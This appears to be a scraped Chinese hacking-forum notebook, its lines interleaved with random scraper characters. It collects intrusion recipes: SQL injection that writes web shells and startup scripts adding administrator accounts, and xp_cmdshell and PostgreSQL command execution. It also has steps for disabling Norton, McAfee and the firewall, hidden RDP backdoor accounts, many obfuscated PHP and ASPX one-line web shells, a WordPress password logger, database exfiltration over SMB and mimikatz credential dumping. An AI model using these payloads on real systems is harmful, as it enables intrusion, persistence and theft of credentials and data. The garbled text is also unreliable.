8 M3 G0 o) p. c( {* D+ c: L6 Y( V9 i
use test;3 I% j& ~. B! |$ c# ~# @
create table a (cmd text);
" F5 l8 }+ o1 A8 ?. Winsert into a values ("set wshshell=createobject (""wscript.shell"") " );8 o0 E$ w0 a6 ?/ L2 a
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
# {: f/ {7 C* h4 s! d, E6 l! T2 pinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
8 q2 X- ?; e9 \, {1 {+ e" jselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";' H# J" {5 N0 x0 U) ]
drop table a;
7 Q0 ]9 R( y7 v; J2 g* x4 Y- l7 o$ B5 ^4 T7 F
英文版本:
" m% [" @/ e; I* R, f% u0 E! {% ~9 S1 f" y& j* X8 ^
use test;. [, ^4 W$ d1 V6 _
create table a (cmd text);
" R+ }& R6 O/ C1 Z% F- R; Jinsert into a values ("set wshshell=createobject (""wscript.shell"") " );8 T+ g: u- \- K' {0 P
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
3 D5 M4 c& n* N+ h" k, Rinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
# [! w; W6 O5 L+ Z+ yselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
( S5 M2 y- W8 R2 v- V6 l% Ddrop table a; x9 |0 u* b, X
" ^- ]/ C8 `- y! tcreate table a (cmd BLOB);. T# B! L0 x& d
insert into a values (CONVERT(木马的16进制代码,CHAR));$ H2 y% U) z9 | J
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'3 g( }; ]" Q" c# z& z$ j
drop table a;- a9 E4 v& t1 u" D, ~* Y0 Y
/ S0 @. F5 {8 K+ l9 c& O( r记录一下怎么处理变态诺顿! \. l" {4 O' {* c
查看诺顿服务的路径
* Y2 `6 g7 M9 v+ Z. k5 v8 gsc qc ccSetMgr$ [! ?- X( i. F
然后设置权限拒绝访问。做绝一点。。
( o+ _ r5 t% g! m' _6 I* [& ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system* R1 \6 r, N3 X; n
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
! x; G |* [. L4 L+ dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
3 ]8 o3 I" ?. e: ]4 r9 } }cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone2 E3 x# i. l" y) h: P
. i* _5 q; ]4 [5 x( g9 v8 K然后再重启服务器( g3 o0 L2 o" x
iisreset /reboot
) G- e B( ]$ d$ R' m6 r这样就搞定了。。不过完事后。记得恢复权限。。。。
* I. v! {6 e- K5 [) o. d. hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F5 e& {9 {. g7 U* Y: N3 A5 L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
+ ~# m( V8 U, e. x1 m6 I5 Xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
4 P& P, _6 Z2 F* r C$ @8 T% W qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F4 y1 a5 o$ T2 S
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
( I$ |* C- T0 }( \' q/ F( o8 E x) |! n, a! L3 V1 d+ Q4 p
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')0 @. d* w; m3 ?
* ?# s/ l$ r. W% ^8 h# V* Cpostgresql注射的一些东西6 K% i3 _) R, ^9 ^. Z; s
如何获得webshell" L8 s) {. w+ N/ t: {' T, x& T8 A7 F. {
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
, b: ^5 N* V" H9 b4 b7 { thttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ; _! S7 x; s' F3 Q: V( D. v
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;5 C+ |# l, B5 @! N$ J6 R; @1 D- h" v
如何读文件
' O* t& Z( Q; D" o3 s: t9 thttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
( ?( `! Y% F2 Jhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
- t& w" [! K3 G' bhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
' v6 n4 R4 a | g: f) I+ ~. k+ j5 U1 c! A
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。' q$ }- m, X6 `1 q
当然,这些的postgresql的数据库版本必须大于8.X
0 X" h( P2 i( j1 l8 q创建一个system的函数:6 @# W/ \( A; ?, s9 T
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT" R1 Y) _9 D3 Q
$ q' j1 Z- p. D$ `! n/ A+ D3 a
创建一个输出表: g. C( S7 L5 Q
CREATE TABLE stdout(id serial, system_out text)
2 w( [ _/ K3 g: Y7 j, [+ s9 w4 x2 _- p& L7 @+ q
执行shell,输出到输出表内:% L# r0 j6 Y8 r e/ o f+ K
SELECT system('uname -a > /tmp/test'): ~" K7 q) i8 r1 u
" y+ y# i; a7 A9 Tcopy 输出的内容到表里面;
# F8 j$ L5 d; ]8 iCOPY stdout(system_out) FROM '/tmp/test'
" M/ u: M# X" N' r' T+ {
+ m0 b& j6 f0 d从输出表内读取执行后的回显,判断是否执行成功
h" @" \/ l( i& o' S& z4 Z3 q3 f4 w1 O) `. a) g. j
SELECT system_out FROM stdout9 W0 J$ h9 |$ @" J
下面是测试例子
) L) U" }! k: d* O: X; A) U% C/ C9 S0 u& Z
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
0 W0 s9 J, c- D; p+ [0 T) W; K2 w0 w/ J- ~# @- C+ ]6 V
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'2 t+ E9 w# V$ P# \
STRICT --
; F) o P3 h% M. \2 p7 u% j1 k1 B- n: y' A& z
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
! h5 D7 m: R/ _3 q. `6 q* g! C/ p; r7 x, w
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
. [( w6 \/ E8 {# P, j' K; O' s6 A1 A' X0 B- b% J- M
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
$ v- Z: _+ B$ d) k/ m( Anet stop sharedaccess stop the default firewall
, O% [& U2 z r3 `netsh firewall show show/config default firewall, G6 `. w/ A5 C ]; n3 U
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
: c# k$ M6 v9 E% b. Inetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall) K1 r$ D& P4 V0 b( |
修改3389端口方法(修改后不易被扫出)% v# o! C+ F1 L; o8 A9 n) o5 K$ l
修改服务器端的端口设置,注册表有2个地方需要修改; m# C+ G& H( F% @
# w! p! g5 v2 ?
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]% e3 ?2 O2 [, G; r! I/ O; g
PortNumber值,默认是3389,修改成所希望的端口,比如6000
# `4 \6 f5 D/ W# ^, U! N3 e
& V' I1 J1 O9 o$ y" j1 H第二个地方:8 h* O7 X6 R1 G0 J7 o( W% g
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] c6 g0 h& c% a& P6 M
PortNumber值,默认是3389,修改成所希望的端口,比如6000* R6 C" B9 N5 e5 @% c. [4 v/ ?
* E$ F! I6 E8 s! Z9 C
现在这样就可以了。重启系统就可以了
" a6 ~5 X' r8 v+ T" E
S7 _& J7 P2 i1 I" k查看3389远程登录的脚本# e6 X% r0 Y2 L0 V l
保存为一个bat文件
8 g3 a' v( Y* L# V: K$ U" a4 {$ O: Kdate /t >>D:\sec\TSlog\ts.log2 b2 v o" R0 [. X! \- j+ q; t" L5 k
time /t >>D:\sec\TSlog\ts.log
0 `- e5 k# M7 y' P' `% _netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
5 Z9 x) s) U% z* `. p4 Mstart Explorer
2 {/ b' }/ K; \5 o
2 C5 `/ [* P4 `! [mstsc的参数:8 B. q0 D& y; U7 L
' X. B) {- K# k+ ]& o; _
远程桌面连接! E3 V9 l" ~) w+ J6 W0 Y e c
) k+ K; |" y0 [/ j; |6 ]MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
: Q$ A2 F/ G% W; H" j7 G. ^9 I ^ [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?& B \/ w: f& A% O9 |5 p* G
3 Q- y9 s, R: D% H
<Connection File> -- 指定连接的 .rdp 文件的名称。) W+ |$ [* p6 M6 x
9 d1 F7 Y% a o+ Z
/v:<server[:port]> -- 指定要连接到的终端服务器。3 O7 ^3 }" F4 E# U9 ~5 i
/ j; ~& s+ [2 e0 k
/console -- 连接到服务器的控制台会话。1 W; ?3 F9 M( h( Q
% K$ ^$ |( E+ j' Z; U! `. X) R
/f -- 以全屏模式启动客户端。
u- @# ]6 N+ m
+ y# g6 K- f! P; w% X) \/w:<width> -- 指定远程桌面屏幕的宽度。
5 w4 e r, b5 X, M
7 ^" W6 y% j% m/ K6 ^( a1 L/h:<height> -- 指定远程桌面屏幕的高度。
: F- j! D1 |% {! u6 B. N! ]6 Z& x1 W( M5 c6 U3 U: h+ r) `
/edit -- 打开指定的 .rdp 文件来编辑。, i" A' D5 r( B' s4 [" E
2 W) [0 r$ {+ `8 Y! l3 h5 `) A7 F+ B0 M/migrate -- 将客户端连接管理器创建的旧版
, w7 i! @1 A: s1 H' I0 g: k, t2 ~连接文件迁移到新的 .rdp 连接文件。1 e# z) R( \) W6 a1 x, U
% d6 h7 P( T2 H. @3 a, \) V6 A
7 y; d: U$ }% B. Z6 M% J) ~& L+ x) Z其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
; S+ @4 r) o2 t0 ~5 K% t5 [mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
. s; q2 z) ^& y# f: H: W
' p* a) e# c# _$ k! R' I4 G. b命令行下开启3389
4 w+ a( J" t6 H5 G! `6 e. knet user asp.net aspnet /add
/ b% N( S$ h) x9 l) X3 d7 A' rnet localgroup Administrators asp.net /add
0 ^7 p% b: Q4 y. {" m( T }net localgroup "Remote Desktop Users" asp.net /add
K( K5 D2 o) I, Pattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
/ ~% B/ I* v- C( E% _5 xecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 f, t2 u+ @5 U0 j) l* A0 b
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1 m* T8 y& e1 T3 O: Z
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
: M0 E7 E4 {+ |6 c$ y7 vsc config rasman start= auto- {, S+ ?3 m: U1 Q
sc config remoteaccess start= auto- l# r7 R& L% |8 b$ K, v7 W
net start rasman
- V7 D! h6 x: }+ Rnet start remoteaccess; g( H& \* C/ ^# x! M/ n
Media3 q1 Q8 X. P8 f$ T9 u) k! A
<form id="frmUpload" enctype="multipart/form-data"
4 D% n' Z- l4 M# Iaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
* `9 p, t( L: C; p9 L<input type="file" name="NewFile" size="50"><br>' u* T m3 V3 X4 ^
<input id="btnUpload" type="submit" value="Upload">
$ R! O, L& H- G2 x- s2 h+ R& B4 T</form>
7 J; [# g9 P2 X6 r7 V" U+ m( j- J/ I6 v7 V: j; |# k* M
control userpasswords2 查看用户的密码% h1 [/ |0 |4 y' Z! r3 K& @
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
8 A' U* f$ F2 |SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a6 E3 T& c& I- z& b/ `8 g. w' w
' o s* Z; k, w( Z4 \3 a( A w141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
! Z% M3 a% m3 Z) M. v' W7 z测试1:
9 O( q3 O' M0 }/ H9 j" v( e' OSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
2 h3 [% s O, s! ?! F. j7 r8 A1 w5 X4 W
测试2:
0 S( p" u4 q( O' r, s! U. O( U# X" ]" C7 D6 K
create table dirs(paths varchar(100),paths1 varchar(100), id int)
% v8 f* W2 i p- p6 \
6 m' ^ _" C! g( Edelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
/ ]0 B# o& M( U# w K' {* u; X( {' [ {3 }; K( G5 D0 l h
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t13 B. D. S* }# O+ k
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
) e& }. f0 o w3 U: Z, x% H" R可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;4 a2 l) j8 G% L
net stop mcafeeframework2 `0 T/ P7 |6 Z. D
net stop mcshield
6 F6 y: r' ]' }" U5 s) S7 f. ^net stop mcafeeengineservice: D7 x* w+ @% J% f* l. J
net stop mctaskmanager6 }) d: l- b/ z3 v" m/ J) A0 W# \
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
" j3 @ b5 c& s
! \7 T! @7 g; X6 Z3 m8 { VNCDump.zip (4.76 KB, 下载次数: 1) . c5 A, x/ q) F6 K, }6 ]9 [
密码在线破解http://tools88.com/safe/vnc.php( e* g' }' x1 `7 [" z, p, l
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
3 P* o' ^6 u1 e# i: P( J3 i/ F; A2 G$ T* z6 V- u: k( B& g
exec master..xp_cmdshell 'net user'
4 @; C/ h; K' {& q( L) t z) kmssql执行命令。
# O2 ~; r; F. K) \2 F获取mssql的密码hash查询
' `/ d$ H$ y4 N6 `5 }. y+ }select name,password from master.dbo.sysxlogins* m% i0 J0 t) C W: P. a6 f" h; k
/ h0 `* _2 u7 Y. i# I1 B8 \, f
backup log dbName with NO_LOG;# @, n1 \$ z$ S: l2 X2 G
backup log dbName with TRUNCATE_ONLY;
2 S. [( b4 O* p. D1 O+ A5 L; f8 MDBCC SHRINKDATABASE(dbName);* X) D( r1 h- M8 ?; K* d1 p: D
mssql数据库压缩
1 x4 y! n, v: k% p# j& L% ?2 c- R
5 d% h" b9 f2 @/ t& R$ `8 ]* NRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK2 a, k5 r' ]+ G# ]9 @2 Q
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
) r' A/ o- M" l6 W( B5 v4 y
; A4 K9 r8 ]( H4 B6 ?4 ^0 Fbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
* f. r# S. e& Y- B7 m+ q备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak! T7 \2 y, E3 S/ J) g% [8 _% C
( `- L$ b( H5 K, yDiscuz!nt35渗透要点:$ w! J$ r1 K6 y, I" a
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
* Q0 |2 X& T" c# W1 N; J(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
3 }5 `; N8 Y+ Z! m(3)保存。! n6 } Z2 w9 c) Y3 A
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass6 [) s% y6 u/ n9 M {8 J1 Y
d:\rar.exe a -r d:\1.rar d:\website\% t& Y3 l) ?7 N/ u
递归压缩website3 C6 h' I5 e d$ x7 F8 ^
注意rar.exe的路径 \ ?5 S6 A) T
2 o, D8 A; D7 @/ G$ W<?php1 l# e; m$ o7 `
* R* z/ z8 q: s* z
$telok = "0${@eval($_POST[xxoo])}";
6 s& }9 z, x# G" T, O4 W% F3 n
$username = "123456"; s$ ^9 k7 k5 p5 \0 n" W
/ V$ q( ~+ P9 r$ g7 ^, I/ C: i8 s$userpwd = "123456";* l/ W- @( m2 Y/ X1 G: @
6 m/ S7 \4 V1 E8 B$telhao = "123456";
: w2 D* w3 ^0 W q9 P `' \/ _! Y, A8 Y% f& a
$telinfo = "123456";
. t- s- |& A k `
) I7 w/ \5 Q, c, B$ j?>
* I3 c8 B. N; ~1 ?5 U2 Cphp一句话未过滤插入一句话木马
/ i) @3 L/ Z* x* Q, s" n6 x- t
& U- e+ Q- A3 Z. W6 K站库分离脱裤技巧+ ^) o: [ v5 n7 X; z+ r4 B
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'% E- q9 q9 [, s2 d' Y
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'. X6 [$ h/ t2 h0 @" V$ A+ G0 T z
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
- A4 R- P) r% q- X) r v2 |这儿利用的是马儿的专家模式(自己写代码)。, L) H! s7 l. x3 I' G
ini_set('display_errors', 1);
' a& }4 w$ e' A2 e8 `set_time_limit(0);8 c! ]0 W! H U; N& H6 }
error_reporting(E_ALL);: ~% ~; p4 J7 w' p$ }
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
2 T" W& m' J. o/ vmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());) n$ ^# N* {7 W1 m7 b7 z
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error()); B% \' c, T. R+ t4 D) @+ s, U
$i = 0;
- F+ L2 L2 B2 G0 y( d: y$tmp = '';
' h2 y( i" J2 A2 A- X6 Rwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
) g, ?9 Y2 V. Z# h" d $i = $i+1;6 a% {3 n( m# R6 |- p4 X( J! K. b
$tmp .= implode("::", $row)."\n";
) ?& R: B6 K- V( q if(!($i%500)){//500条写入一个文件' ?# k& k* T' d' t! v# ~0 y6 v; C
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
# U- u! w3 r i+ r file_put_contents($filename,$tmp);
3 T8 m* J9 V h0 S $tmp = '';! ?/ b# G& D' R7 H
}
6 h3 Q. q' e* K5 r( l" V, p}+ `$ h( H) P; |2 x$ u
mysql_free_result($result);$ w% q, }4 }) Y
* }' ^, a1 `; B
- y6 w( c& i7 s
1 D3 |" k' Z: N0 a$ f# Y. N//down完后delete
7 S# s4 y) ~0 i9 F5 }; a8 Q% A6 u. u
: S$ Z$ w" X; |; {0 H) y M6 |6 i+ ]- n: i
ini_set('display_errors', 1);, g, H" q' ?9 b9 C" y( h( X
error_reporting(E_ALL);; Y5 y( f, o- x( B
$i = 0;
6 G# g* D+ U* `while($i<32) {: v" T+ e: T# V2 J6 d) Z6 q
$i = $i+1;! Z* j o5 k9 \9 l0 k- \% L) t
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';; I* Y3 _; q2 E# X
unlink($filename);
5 q0 R( F5 x8 ]* e) P" D2 a} . ^8 ?# K/ d8 s3 H
httprint 收集操作系统指纹
M& R$ m, Z" u9 F扫描192.168.1.100的所有端口
6 \3 \3 c6 ?* Z5 }7 snmap –PN –sT –sV –p0-65535 192.168.1.100
# J: a! Z. o# g: Q; x! khost -t ns www.owasp.org 识别的名称服务器,获取dns信息3 R T9 ^. G% [- M! v
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
3 u; ]4 J3 A4 s5 `; ?; v8 ANetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
7 w$ W/ P; N. \- y# Y* j; w: d U6 Y* k/ N
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
, \/ T- M: J8 n& ?' R0 C. n0 Y& c3 O- P$ I! d3 i$ e
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)" e9 ?) [9 n) k& U+ u, D
; u E+ A7 t7 `% w4 J
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
6 ?! d! A0 F! R/ @$ n, h
5 \. v: K' D/ H( {3 }( @ DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
+ ~& I! s; V) Q: H i1 z N# h7 ~
, r+ ?- `( o4 z" `, e http://net-square.com/msnpawn/index.shtml (要求安装)+ F' C5 R) O; a' M
7 i1 ]: R. S+ g; k# p3 A
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)0 p1 q, m, g" ]
) }& c* O2 G7 t* N
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
7 a. e5 p7 x- n" g' a9 Kset names gb2312
2 [8 A- y; Q% H- o导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。' n( v$ ~' p3 E: {
8 O9 Z& j2 ?; P5 w( \
mysql 密码修改: l6 W+ P; {1 M+ T
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” " @5 R: c1 @- W- f2 y1 O
update user set password=PASSWORD('antian365.com') where user='root';0 Z3 S4 W8 t8 j
flush privileges;
4 w: x0 M+ x4 Z- Y0 A' y/ A高级的PHP一句话木马后门
' ]6 q1 M5 P$ K, ?, f/ [& N+ Z+ k) Q/ x1 S# [
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
1 q: g+ S( e g6 h9 F
a) [. Q. _* P1、
5 P- S# t; V( x+ |2 n3 b' M: y1 y( }
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
5 Q% M( R% K) E$ u# D1 C' x1 w! A) B- L; i6 a
$hh("/[discuz]/e",$_POST['h'],"Access");/ k" V- ~6 l, }5 h
: k! _$ s* z% j: ? d//菜刀一句话; n" C8 ^9 ^; u9 J0 F& R: N" k
! H& V7 U) x+ P
2、
9 ^% B0 U% b$ O3 P, }' G
7 T- F) l% l% O7 u* h5 B$filename=$_GET['xbid'];
+ _0 I" c6 z/ @, d9 Y! x: F% V+ h: \0 F+ H$ f/ v
include ($filename);
5 J8 j9 ]" T# W2 z1 X% o
% n# Z* {8 s9 L/ F* U//危险的include函数,直接编译任何文件为php格式运行' R" G$ I9 W- T/ r5 X. a9 @9 {
' p) E8 [) J. y. ^6 r7 i
3、' \3 u6 e, ]. ~! M. G9 n6 J
" e8 [& I& v& G1 z$reg="c"."o"."p"."y";
5 X! a) Q& f: A! ^
/ l3 c8 G' w( a) I4 w$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);, ?9 V9 m/ T& A+ Z1 ~9 j
+ s% I* K8 @/ W$ O% J//重命名任何文件
/ F* r# v3 _; C! ?3 y% X
) P: F9 ]3 p* a6 j+ s4、
' }: T' {% |0 ?
0 C' l8 n! B+ ~, u* ^$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";& l! p+ i+ _6 f) K. F
# b0 Z2 u0 `" Y" e5 n: x$gzid("/[discuz]/e",$_POST['h'],"Access");1 W. `8 K1 X8 W- o6 B" a
- m- ^- U2 d. e0 Y
//菜刀一句话9 y2 ~4 ?* p0 T
$ J& U5 m6 r+ J. n8 F" R% Y
5、include ($uid);) D$ V1 ~% Y: e- I: z; e; A
l- |$ W( d! }: {5 B
//危险的include函数,直接编译任何文件为php格式运行,POST : p! F. b- O' _. f, E
/ J; V: m$ A# a* i! i; \" Z; S
' C+ a* U' U! s8 V5 \' q//gif插一句话4 A; E& \0 u: V$ J/ G& ]
1 F/ q' s' P& P" O6、典型一句话
, i# A' o5 H! d' k
7 e& [" k" G7 h& G) [) C. J6 E' l. p3 J程序后门代码9 x6 }; I8 B# k4 ]
<?php eval_r($_POST[sb])?>3 D1 n) x9 J' V" \3 i0 N
程序代码
7 X0 `/ Y7 {1 o# b2 ^: `9 _<?php @eval_r($_POST[sb])?>
) t+ f- \0 E. H//容错代码
1 {8 H8 W4 p/ _ o& _% [程序代码6 @# P) B6 B. Q* p
<?php assert($_POST[sb]);?>
6 n8 D. w' ~4 n c//使用lanker一句话客户端的专家模式执行相关的php语句
0 X2 v2 X1 e! e0 F程序代码
0 J6 \( t" B( M: e- ]6 ?<?$_POST['sa']($_POST['sb']);?>
6 Q$ x6 D4 j, z. L' S! U8 C) T0 ^程序代码$ h# F! @4 v) F' Q: l
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>5 ?& q# }9 A' g# d( M/ C
程序代码9 H% J5 g1 _$ z( ?
<?php
% g( I; ?- R7 ^) t7 B2 B7 S9 Y@preg_replace("/[email]/e",$_POST['h'],"error");
% ^8 ?0 p0 x* [, _/ O?>
^4 \8 \5 f# [4 ^4 p7 y1 Z//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
: F4 z r! w2 [0 ?$ m( Y! U d$ h1 r程序代码
. H. V% r& z B5 L3 N. a8 v<O>h=@eval_r($_POST[c]);</O>3 @$ W2 y7 s/ Q; B, P; _
程序代码% h* Q# M( @8 L
<script language="php">@eval_r($_POST[sb])</script>
u2 e" L8 h* m7 u//绕过<?限制的一句话
# z" ?2 ^/ C; \$ r$ ]/ o9 Y) }
' Q, h$ D _ H% A1 shttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
! \% U5 F, D5 {/ d) X详细用法:2 P" d; y5 _. q3 X7 l
1、到tools目录。psexec \\127.0.0.1 cmd F' Q2 w) f6 x) A& q& ?. y: ~( J
2、执行mimikatz
1 _ O$ w( a2 _1 q% E1 d3、执行 privilege::debug+ I* a' y U+ V4 Z3 e
4、执行 inject::process lsass.exe sekurlsa.dll
' ^& h7 a) q* q) u* x4 M( m% e5、执行@getLogonPasswords, k( ~0 E. T. C' H% V
6、widget就是密码% M* U1 j& s: }( c% W
7、exit退出,不要直接关闭否则系统会崩溃。
d* K1 E$ R% ?( | S# Y# [2 u- H- p0 X+ d
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面/ w" X3 Y, o& A0 ]' C8 A) z: N+ U
5 j( M1 w6 D/ W/ ~! \0 C自动查找系统高危补丁, Q% g9 \/ \7 |$ f. M
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt' @" l1 F2 `: u
+ F$ I, L* q5 Y7 y* |7 V
突破安全狗的一句话aspx后门. |5 `% v# U% }) y3 [" t
<%@ Page Language="C#" ValidateRequest="false" %>
/ m6 V* C4 O. Q- a2 @, f+ _<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
4 C0 d v& y, s9 n1 a3 K+ Uwebshell下记录WordPress登陆密码2 r- G) V% g0 g% `6 @( @
webshell下记录Wordpress登陆密码方便进一步社工
, `( Q4 m1 @; D. t) q在文件wp-login.php中539行处添加:1 e/ e0 ]9 h. ]# x
// log password
! h5 }0 z' `1 H* {0 ~) J+ c& f$log_user=$_POST['log'];) c+ e# Z! M8 w2 E
$log_pwd=$_POST['pwd'];; j: G8 l/ N0 j, Q
$log_ip=$_SERVER["REMOTE_ADDR"];$ n+ N. ]% n4 }1 S0 q3 j; @5 {; ~
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;2 ~7 k% m' R5 @% S @
$txt=$txt.”\r\n”;9 j( j! d$ _+ w3 U6 H( Y
if($log_user&&$log_pwd&&$log_ip){
, n) n# Z: Z3 H7 w( u@fwrite(fopen(‘pwd.txt’,”a+”),$txt);8 D- j# q5 E; g2 n
}3 l, l& n1 D) y
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。- L6 w) v& D5 Q0 S
就是搜索case ‘login’% {) W. X( b' N8 T& v
在它下面直接插入即可,记录的密码生成在pwd.txt中,7 b' Z& J6 I/ Z0 ]4 |6 i1 x
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录; K$ e @7 U1 W% O
利用II6文件解析漏洞绕过安全狗代码:4 K' A/ ` Q- ^; u9 \
;antian365.asp;antian365.jpg9 }4 W8 u9 Z" T" @6 q, L* \
1 b B9 |" U5 [; o0 P
